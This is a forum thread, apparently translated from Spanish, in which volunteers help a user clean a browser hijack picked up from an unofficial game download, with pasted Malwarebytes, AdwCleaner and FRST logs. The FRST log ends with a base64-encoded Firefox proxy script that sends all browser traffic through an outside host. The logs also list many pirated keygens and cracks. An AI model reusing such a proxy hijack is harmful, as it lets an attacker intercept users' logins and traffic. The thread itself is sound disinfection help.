Browser keeps opening tabs


#1

First of all, congratulations on the forum's revamp!

I recently downloaded a game from a site other than my trusted one, and one of the steps was to download an executable in order to get to the torrent. I already suspected that was where the "little surprise" was; I got what I was looking for, plus the problem that brings me here.

Every so often, I don't know how often, the browser (Mozilla) launches, or if it is already running, a tab opens to the following address:

http://my-secure[.]org/?ref=6003&co=CO&dd=6f03b1fc12b19b0aab91c24288)

It tries to download an executable, but Mozilla blocks it; the thing is that if I am doing something else, this interrupts it.

Along with this, and what worries me most, my Gmail accounts get signed out on their own and I have to log in again; of course, this did not happen before.

I thought running Malwarebytes Anti-Malware would be enough, but it turns out it was not. So I am asking for help with this matter; thank you for your attention.


#2

Greetings and welcome to the new Forospyware.

Carry out the following steps, without changing the order:

1) Download, update and run Malwarebytes' Anti-Malware.

Malwarebytes manual, so that you know how to use and configure it.

  • Run a Custom Scan, ticking all the boxes on the right and on the left, and updating if it asks you to.
  • Click "Remove Selected" to send the items to quarantine, and restart the system.
  • To access the scan report afterwards: Reports >> Scan log >> click >> Export >> Copy to Clipboard, and paste it into your reply.

2) Download AdwCleaner to the desktop.

  • Disable your antivirus :arrow_forward: How to temporarily disable an antivirus and any security program.

  • Run Adwcleaner.exe (if you use Windows Vista/7 or 8, right-click and select "Run as Administrator").

  • Click the Scan Now button and wait for the process to finish, then immediately click the Start Repair button.

  • Wait for it to complete and follow the instructions; if it asks you to restart the system, accept.

  • If it finds nothing, click "Skip Repair".

  • The log is found in the "Reports" tab, reopening the program if necessary, or in "C:\AdwCleaner\Logs\AdwCleaner[C0].txt".

You can look at its manual >> AdwCleaner manual

3) Download CCleaner

Install it and run it. In the Cleaner tab, leave the default settings as they are, click Analyze, wait for it to finish > click Run Cleaner. Click the Registry tab > click Scan for Issues, wait for it to finish > click Fix Selected Issues and make a backup.

Paste the Malwarebytes and AdwCleaner reports and tell us how the problem is going.



#3

Sorry for not replying sooner. Now that I have time I have tried to download the recommended programs, but whenever I go to the Malwarebytes page, or even just search for malwarebytes on Google, the browser and the whole PC freeze. The only thing that works is Ctrl+Alt+Del and restarting; it won't even let me bring up Task Manager: the screen goes black if I try and shows no further image. Could this be the virus's doing? It seems to me the matter is even more complicated.

I will keep trying; if I don't manage it I will report back, otherwise I will bring the reports.


#4

Try doing it in Safe Mode with Networking.


#5

Malwarebytes log:

Malwarebytes
www.malwarebytes.com

-Detalles del registro-
Fecha del análisis: 17/10/18
Hora del análisis: 12:43
Archivo de registro: 2abe3988-d234-11e8-8cce-000000000000.json

-Información del software-
Versión: 3.6.1.2711
Versión de los componentes: 1.0.463
Versión del paquete de actualización: 1.0.7403
Licencia: Prueba

-Información del sistema-
SO: Windows 7 Service Pack 1
CPU: x64
Sistema de archivos: NTFS
Usuario: Dango-PC\Dango

-Resumen del análisis-
Tipo de análisis: Análisis personalizado
Análisis iniciado por:: Manual
Resultado: Completado
Objetos analizados: 1101840
Amenazas detectadas: 47
Amenazas en cuarentena: 47
Tiempo transcurrido: 9 hr, 57 min, 53 seg

-Opciones de análisis-
Memoria: Activado
Inicio: Activado
Sistema de archivos: Activado
Archivo: Activado
Rootkits: Activado
Heurística: Activado
PUP: Detectar
PUM: Detectar

-Detalles del análisis-
Proceso: 0
(No hay elementos maliciosos detectados)

Módulo: 0
(No hay elementos maliciosos detectados)

Clave del registro: 0
(No hay elementos maliciosos detectados)

Valor del registro: 1
Generic.Malware/Suspicious, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\SHAREDDLLS|C:\PROGRAM FILES\SOLIDWORKS CORP\SOLIDWORKS ELECTRICAL\REDIST\PDFCREATOR-1_2_3_SETUP.EXE, En cuarentena, [0], [392686],1.0.7403

Datos del registro: 0
(No hay elementos maliciosos detectados)

Secuencia de datos: 0
(No hay elementos maliciosos detectados)

Carpeta: 1
PUP.Optional.ForcedInstalledExtensionFF, C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\browser-extension-data\{56a1e8d2-3ced-4919-aca5-ddd58e0f31ef}, En cuarentena, [1701], [580170],1.0.7403

Archivo: 45
PUP.Optional.ForcedInstalledExtensionFF, C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\browser-extension-data\{56a1e8d2-3ced-4919-aca5-ddd58e0f31ef}\storage.js, En cuarentena, [1701], [580170],1.0.7403
Trojan.Waldek, G:\USBFIX\QUARANTINE\H\ \-_--_-_--_-__-_--_--_-__-_-__-_--_--_.{3EC6593E-27A1-44B6-87D3-ADD9629D40EA}.VIR, En cuarentena, [8669], [364189],1.0.7403
RiskWare.GameHack, F:\RISE RAJAS\AGE OF EMPIRES II HD\STEAM_APIRAJAS.DLL, En cuarentena, [7832], [305544],1.0.7403
RiskWare.GameHack, E:\DATA\DOCUMENTOS\DESCARGAS\COMPRESSED\AGFEII-TRR-RLD-PGME\AGE.OF.EMPIRES.II.HD.THE.RISE.OF.THE.RAJAS-RELOADED\RLD-AOE2HDRAJAS-COMPUCALITV\CRACK\STEAM_APIRAJAS.DLL, En cuarentena, [7832], [305544],1.0.7403
PUP.Optional.IntroKeygen, E:\DATA\DOCUMENTOS\PROGRAMAS\ANTIVIRUS\MALWAREBYTES ANTI-MALWARE\MALWAREBYTES.ANTI-MALWARE.PREMIUM.V2.2.0.1024.MULTILINGUAL.FINAL.INCL.KEYMAKER-FFF\KEYGEN' S\MALWAREBYTES.ANTI-MALWARE.V1.50.KEYMAKER-CORE.RAR, En cuarentena, [13689], [279993],1.0.7403
RiskWare.Tool.CK, E:\DATA\DOCUMENTOS\PROGRAMAS\ALCOHOL 120%\ALCOHOL 120% WINDOWS 7\ALCOHOL-120-V2.0.2.4713-FINAL-RETAIL.RAR, En cuarentena, [5791], [137312],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\BURLADOR DE SEGURIDAD INTERNET\U998.EXE, En cuarentena, [0], [392686],1.0.7403
RiskWare.DontStealOurSoftware, E:\DATA\DOCUMENTOS\PROGRAMAS\ANTIVIRUS\MALWAREBYTES ANTI-MALWARE\MALWAREBYTES.ANTI-MALWARE.PREMIUM.V2.2.0.1024.MULTILINGUAL.FINAL.INCL.KEYMAKER-FFF\KEYGEN' S\KEYGEN-PTRICK\PATRICK.EXE, En cuarentena, [5335], [278514],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\ANTIVIRUS\ESET NOD 32\ESET NOD32 VER7 X64\ACTIVACION PERMANENTE\CRACK ESET FIX\ESET FIX.EXE, En cuarentena, [0], [392686],1.0.7403
RiskWare.DontStealOurSoftware, E:\DATA\DOCUMENTOS\PROGRAMAS\ANTIVIRUS\MALWAREBYTES ANTI-MALWARE\MALWAREBYTES.ANTI-MALWARE.PREMIUM.V2.2.0.1024.MULTILINGUAL.FINAL.INCL.KEYMAKER-FFF\KEYGEN' S\MALWAREBYTES_.ANTI-MALWARE.V1.46.KEYGENERATOR-INF.ZIP, En cuarentena, [5335], [145079],1.0.7403
RiskWare.Tool.HCK, E:\DATA\DOCUMENTOS\PROGRAMAS\AUTODESK\AUTODESK INVENTOR PRO 2015 X64\XF-ADSK2015_X64.7Z, En cuarentena, [7792], [65468],1.0.7403
RiskWare.DontStealOurSoftware, E:\DATA\DOCUMENTOS\PROGRAMAS\ANTIVIRUS\MALWAREBYTES ANTI-MALWARE\MALWAREBYTES.ANTI-MALWARE.PREMIUM.V2.2.0.1024.MULTILINGUAL.FINAL.INCL.KEYMAKER-FFF\KEYGEN' S\MALWAREBYTES.ANTI-MALWARE.1.50.READNFO_KEYGEN-FFF.ZIP, En cuarentena, [5335], [278517],1.0.7403
RiskWare.Tool.HCK, E:\DATA\DOCUMENTOS\PROGRAMAS\DISEñO Y ANIMACION\AUTODESK MAYA 3D 2014\ACTIVAR AUTODESK MAYA 3D 2014\CRACK-WIN\XF-ADSK64.7Z, En cuarentena, [7792], [65468],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\DISEñO Y ANIMACION\ANIME STUDIO +PRO11\ANIME STUDIO 10 PRO\CRACK\XF-SASPRO10.7Z, En cuarentena, [0], [392686],1.0.7403
RiskWare.Tool.CK, E:\DATA\DOCUMENTOS\PROGRAMAS\ALCOHOL 120%\ALCOHOL 120% WINDOWS 7\ALCOHOL-120-V2.0.2.4713-FINAL-RETAIL\ALCOHOL-120-V2.0.2.4713-FINAL-RETAIL\KEYMAKER.RAR, En cuarentena, [5791], [137312],1.0.7403
RiskWare.DontStealOurSoftware, E:\DATA\DOCUMENTOS\PROGRAMAS\ANTIVIRUS\MALWAREBYTES ANTI-MALWARE\MALWAREBYTES.ANTI-MALWARE.PREMIUM.V2.2.0.1024.MULTILINGUAL.FINAL.INCL.KEYMAKER-FFF\KEYGEN' S\MALWAREBYTES.ANTI-MALWARE.V1.50B.KEYGEN-RED.ZIP, En cuarentena, [5335], [278516],1.0.7403
PUP.Optional.TenkiTechnology, E:\DATA\DOCUMENTOS\PROGRAMAS\CAMBIAR IP\PLATINUM-HIDE-IP-3.2.9.8-FULL.RAR, En cuarentena, [13913], [272964],1.0.7403
RiskWare.DontStealOurSoftware, E:\DATA\DOCUMENTOS\PROGRAMAS\ANTIVIRUS\MALWAREBYTES ANTI-MALWARE\MALWAREBYTES.ANTI-MALWARE.PREMIUM.V2.2.0.1024.MULTILINGUAL.FINAL.INCL.KEYMAKER-FFF\KEYGEN' S\MALWAREBYTES.ANTI-MALWARE.V1.3.X.KEYGEN-CORE.RAR, En cuarentena, [5335], [278514],1.0.7403
CrackTool.FFFTeam.Keygen, E:\DATA\DOCUMENTOS\PROGRAMAS\ANTIVIRUS\MALWAREBYTES ANTI-MALWARE\MALWAREBYTES.ANTI-MALWARE.PREMIUM.V2.2.0.1024.MULTILINGUAL.FINAL.INCL.KEYMAKER-FFF\KEYGEN' S\2.0 KEYGEN-FFF.ZIP, En cuarentena, [11300], [106739],1.0.7403
PUP.Optional.PasswordViewer, E:\DATA\DOCUMENTOS\PROGRAMAS\CONTRASEñAS GUARDADAS REVELADOR\IEPV.ZIP, En cuarentena, [7870], [299461],1.0.7403
RiskWare.Tool.HCK, E:\DATA\DOCUMENTOS\PROGRAMAS\DISEñO Y ANIMACION\AUTODESK MAYA 3D 2014\ACTIVAR AUTODESK MAYA 3D 2014\CRACK-WIN\XF-ADSK32.7Z, En cuarentena, [7792], [65468],1.0.7403
RiskWare.Tool.HCK, E:\DATA\DOCUMENTOS\PROGRAMAS\AUTODESK\AUTODESK INVENTOR PRO 2015 X64\XF-ADSK2015_X86.7Z, En cuarentena, [7792], [65468],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\DISEñO Y ANIMACION\MANGA STUDIO\MANGA STUDIO 5 EX\CRACK\XF-SMS504EX.7Z, En cuarentena, [0], [392686],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\DRIVERS\DLL FALTANTES\DLL FILE FIXER\KEYGEN\DLL-FILES FIXER KEYGEN.EXE, En cuarentena, [0], [392686],1.0.7403
PUP.Optional.OpenCandy, E:\DATA\DOCUMENTOS\PROGRAMAS\GOM PLAYER\GOMPLAYERENSETUP.EXE, En cuarentena, [1064], [297667],1.0.7403
RiskWare.Tool.CK, E:\DATA\DOCUMENTOS\PROGRAMAS\MICROSOFT OFFICE\MICROSOFT OFFICE 2010\EVOACTIVACIONOFFICE2010.EXE, En cuarentena, [5791], [144333],1.0.7403
PUP.Optional.OpenCandy, E:\DATA\DOCUMENTOS\PROGRAMAS\PRIMO PDF\VERSION ULTIMATE\INTERNATIONALPRIMOPDF.EXE, En cuarentena, [1064], [297667],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\NITRO PDF READER\NITRO PDF READER PROFESSIONAL\NITRO PRO V10.5.5.29 FINAL X64\KEYGEN\KEYGEN\KEYGEN NITRO PRO V10.5.5.29 FINAL.EXE, En cuarentena, [0], [392686],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\NITRO PDF READER\NITRO PDF READER PROFESSIONAL\NITRO PRO V10.5.5.29 FINAL X64\KEYGEN.RAR, En cuarentena, [0], [392686],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\NITRO PDF READER\NITRO PDF READER PROFESSIONAL\NITRO PRO V10.5.5.29 FINAL X86\KEYGEN.RAR, En cuarentena, [0], [392686],1.0.7403
PUP.Optional.OpenCandy, E:\DATA\DOCUMENTOS\PROGRAMAS\PRIMO PDF\INTERNATIONALPRIMOPDF.EXE, En cuarentena, [1064], [297667],1.0.7403
RiskWare.CRK, E:\DATA\DOCUMENTOS\PROGRAMAS\MICROSOFT PROJECT PRO 2010 ESPANOL\ACTIVADOR  OFFICE 2010\MINI-KMS_ACTIVATOR_V1.2_OFFICE2010_VL_ENG.EXE, En cuarentena, [8819], [76205],1.0.7403
PUP.Optional.SofTonic, E:\DATA\DOCUMENTOS\PROGRAMAS\PC INSPECTOR SMART RECOVERY\DOWNLOADER PC INSPECTOR SMART RECOVERY\SOFTONICDOWNLOADER_PARA_PC-INSPECTOR-SMART-RECOVERY.EXE, En cuarentena, [1869], [77251],1.0.7403
PUP.Optional.InstallCore, E:\DATA\DOCUMENTOS\PROGRAMAS\CHEAT ENGINE\CHEATENGINE63.EXE, En cuarentena, [402], [500846],1.0.7403
PUP.Optional.OfferBundler.ST, E:\DATA\DOCUMENTOS\PROGRAMAS\HACHA\HACHA DOWNLOADER\SOFTONICDOWNLOADER_PARA_HACHA.EXE, En cuarentena, [12724], [86086],1.0.7403
PUP.Optional.RegCleanPro, E:\DATA\DOCUMENTOS\PROGRAMAS\REGCLEAN PRO\SYSRC_TRIAL_9407_SPANISH.EXE, En cuarentena, [1673], [495008],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\SISTEMAS OPERATIVOS\WINDOWS\LEGALIZADOR SISTEMAS OPERATIVOS\LEGALIZADOR WINDOWS 7\VALIDAR WINDOWS 7\WINDOWS7_LOADER_V1.77.RAR, En cuarentena, [0], [392686],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\SISTEMAS OPERATIVOS\WINDOWS\LEGALIZADOR SISTEMAS OPERATIVOS\LEGALIZADOR WINDOWS 7\VALIDAR WINDOWS 7 EJECUTABLE\WINDOWS 7 LOADER.EXE, En cuarentena, [0], [392686],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\SISTEMAS OPERATIVOS\WINDOWS\LEGALIZADOR SISTEMAS OPERATIVOS\LEGALIZADOR WINDOWS 7\VALIDAR WINDOWS 7 EJECUTABLE\WINDOWS7_LOADER_V1.77.RAR, En cuarentena, [0], [392686],1.0.7403
HackTool.Agent, E:\DATA\DOCUMENTOS\PROGRAMAS\SISTEMAS OPERATIVOS\WINDOWS\LEGALIZADOR SISTEMAS OPERATIVOS\LEGALIZADOR WINDOWS 7\LOADER 2.2.2\WDS LDR V2.2.2 FINAL\WDS LDR V2.2.2 FINAL\WINDOWS LOADER V2.2.2 BY DAZ\WINDOWS LOADER V2.2.2 BY DAZ\WINDOWS LOADER.EXE, En cuarentena, [3928], [563681],1.0.7403
HackTool.Agent, E:\DATA\DOCUMENTOS\PROGRAMAS\SISTEMAS OPERATIVOS\WINDOWS\LEGALIZADOR SISTEMAS OPERATIVOS\LEGALIZADOR WINDOWS 7\LOADER 2.2.2\WDS LDR V2.2.2 FINAL\WDS LDR V2.2.2 FINAL\WINDOWS LOADER V2.2.2 BY DAZ\WINDOWS LOADER V2.2.2 BY DAZ.RAR, En cuarentena, [3928], [563681],1.0.7403
PUP.Optional.SofTonic, E:\DATA\DOCUMENTOS\PROGRAMAS\TROJAN REMOVER\DOWNLOADER TROJAN REMOVER\SOFTONICDOWNLOADER_PARA_TROJAN-REMOVER.EXE, En cuarentena, [1869], [77251],1.0.7403
Generic.Malware/Suspicious, C:\PROGRAM FILES (X86)\FREEMAKE\FREEMAKE VIDEO CONVERTER\SETUPUPDATE.EXE, En cuarentena, [0], [392686],1.0.7403
Generic.Malware/Suspicious, C:\PROGRAM FILES\SOLIDWORKS CORP\SOLIDWORKS ELECTRICAL\REDIST\PDFCREATOR-1_2_3_SETUP.EXE, En cuarentena, [0], [392686],1.0.7403
Generic.Malware/Suspicious, E:\DATA\DOCUMENTOS\PROGRAMAS\ANDROID\EASEUS PARTITION MASTER\KEYGEN.EXE, En cuarentena, [0], [392686],1.0.7403

Sector físico: 0
(No hay elementos maliciosos detectados)

WMI: 0
(No hay elementos maliciosos detectados)


(end)

AdwCleaner log:

-------------------------------

Malwarebytes AdwCleaner 7.2.4.0

-------------------------------

Database: 2018-10-12.1 (Cloud)
Support: https://www.malwarebytes.com/support

-------------------------------

Mode: Scan

Start: 10-17-2018
Duration: 00:00:11
OS: Windows 7 Ultimate
Scanned: 31969
Detected: 0

***** [ Services ] *****

No malicious services found.

***** [ Folders ] *****

No malicious folders found.

***** [ Files ] *****

No malicious files found.

***** [ DLL ] *****

No malicious DLLs found.

***** [ WMI ] *****

No malicious WMI found.

***** [ Shortcuts ] *****

No malicious shortcuts found.

***** [ Tasks ] *****

No malicious tasks found.

***** [ Registry ] *****

No malicious registry entries found.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries found.

***** [ Chromium URLs ] *****

No malicious Chromium URLs found.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries found.

***** [ Firefox URLs ] *****

No malicious Firefox URLs found.

AdwCleaner[S00].txt - [3968 octets] - [04/10/2018 22:03:59]
AdwCleaner[C00].txt - [3565 octets] - [04/10/2018 22:04:32]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S01].txt ##########

Malwarebytes blocked the pop-up tab and I am uploading the report here; the tab still appears even after I had waited about 9 hours while the scan ran:

Malwarebytes

-Detalles del registro-
Fecha del evento de protección: 17/10/18
Hora del evento de protección: 23:04
Archivo de registro: ddb3c624-d28a-11e8-9891-000000000000.json

-Información del software-
Versión: 3.6.1.2711
Versión de los componentes: 1.0.463
Versión del paquete de actualización: 1.0.7407
Licencia: Prueba

-Información del sistema-
SO: Windows 7 Service Pack 1
CPU: x64
Sistema de archivos: NTFS
Usuario: System

-Detalles del sitio web bloqueado-
Sitio web malicioso: 1
, , Bloqueado, [-1], [-1],0.0.0

-Datos de sitio web-
Categoría: PUP
Dominio:EDITADO********
Dirección IP: 185.71.67.6
Puerto: [49193]
Tipo: Saliente
Archivo: C:\Program Files (x86)\Mozilla Firefox\firefox.exe

(end)


#6

First of all… what you have is a PC usage problem, since you have a collection of keygens on the PC, including a pirated Malwarebytes, and that, my friend :-1:

About the alert you posted: did you go to that blocked page on purpose, or does it come up on its own while browsing normally?


#7

All those keygens are extremely old; I have had them for years and they have never given me any trouble. The Malwarebytes keygen I will delete, though. I ran the scan with a clean Malwarebytes, nothing cracked.

That is the page that opens intrusively on its own; I have never gone to it on purpose, and it comes up while browsing normally.

Now, for the past couple of days the PC has been shutting down on its own without warning. I thought it was because of temperature and used Open Hardware Monitor, but I still think it is more likely the virus or whatever it has:

I took the reading after turning the PC back on right after it shut down unexpectedly.


#8
  • Temporarily disable your antivirus and any security program.

  • Download to your Desktop (>> this is very important <<) Farbar Recovery Scan Tool, choosing the right version for your machine (32 or 64 bits) :arrow_forward: How do I know whether my Windows is 32 or 64 bits?

  • Double-click to run Frst.exe. In the Disclaimer window, press Yes.

  • In the new window that opens, press the Scan button and wait for the scan to finish.

  • Two (2) files (logs) will open, Frst.txt and Addition.txt, which will be saved on your Desktop.

In your next reply, copy and paste the two FRST reports, Frst.txt and Addition.txt.

Note: If the requested report(s) do not fit in a single reply because they exceed the allowed number of characters, you can use two or more replies to paste them in full.


#9

Frst:

 Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 10.10.2018
Ran by Dango (administrator) on DANGO-PC (18-10-2018 13:43:34)
Running from C:\Users\Dango\Desktop
Loaded Profiles: Dango (Available Profiles: Dango & DefaultAppPool)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: Español (España, internacional)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Trace Software International) C:\Program Files\SolidWorks Corp\SolidWorks Electrical\server\EwServer.exe
(Microsoft Corporation) C:\Windows\System32\inetsrv\inetinfo.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Nitro PDF Software) C:\Program Files\Nitro\Pro 10\NitroPDFDriverService10x64.exe
() C:\Program Files\Nitro\Pro 10\Nitro_UpdateService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(StarWind Software) C:\Program Files (x86)\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe
(TuneUp Software) C:\Program Files (x86)\TuneUp Utilities 2014\TuneUpUtilitiesService64.exe
() C:\Program Files\802.11 Wireless LAN\802.11n Wireless USB Adapter HW.17\WlanWpsSvc.exe
(TuneUp Software) C:\Program Files (x86)\TuneUp Utilities 2014\TuneUpUtilitiesApp64.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Microsoft Corporation) C:\Windows\System32\mqtgsvc.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

IFEO\ccd-uninst.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\clonecd.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\clonecdtray.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\databasecompare.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\dtagent.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\dtlauncher.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\excel.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\fahconsole.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\helplauncher.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\nitropdf.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\powerpnt.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\regclonecd.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\spreadsheetcompare.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\winword.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\winzip64.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\wzbgtools.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\wzpreloader.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
IFEO\wzupdatenotifier.exe: [Debugger] "C:\Program Files (x86)\TuneUp Utilities 2014\TUAutoReactivator64.exe"
GroupPolicy: Restriction ? <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 190.157.8.33 190.157.8.1
Tcpip\..\Interfaces\{6212BD7F-11F2-4D52-AEAE-C06BDAB0FAA7}: [NameServer] 8.8.8.8,8.8.4.4,192.168.0.1
Tcpip\..\Interfaces\{6212BD7F-11F2-4D52-AEAE-C06BDAB0FAA7}: [DhcpNameServer] 190.157.8.33 190.157.8.1
Tcpip\..\Interfaces\{70239047-0E28-4EAB-B705-B92BCBC8E137}: [NameServer] 156.154.70.22,156.154.71.22,192.168.0.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/es-co/?ocid=iehp
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2016-12-10] (Internet Download Manager, Tonec Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2016-12-10] (Internet Download Manager, Tonec Inc.)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\ssv.dll [2017-08-04] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\jp2ssv.dll [2017-08-04] (Oracle Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2012-10-01] (Microsoft Corporation)
Handler: WSWSVCUchrome - {1CA93FF0-A218-44F1 -  No File
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF DefaultProfile: r533z996.default
FF ProfilePath: C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default [2018-10-18]
FF user.js: detected! => C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\user.js [2017-03-21]
FF Homepage: Mozilla\Firefox\Profiles\r533z996.default -> www.google.com
FF NewTab: Mozilla\Firefox\Profiles\r533z996.default -> about:newtab
FF NetworkProxy: Mozilla\Firefox\Profiles\r533z996.default -> autoconfig_url", "data:;base64,ZnVuY3Rpb24gRmluZFByb3h5Rm9yVVJMKHVybCwgaG9zdCkgeyBpZih1cmwuaW5kZXhPZigiaHR0cHM6Ly8iKSA+IC0xKSB7IHJldHVybiAiUFJPWFkgOTg3NjA3LmJpejo4MDgwIjsgfSBlbHNlIHJldHVybiAiSFRUUFMgOTg3NjA3LmJpejo4MDgwIjsgfQ=="
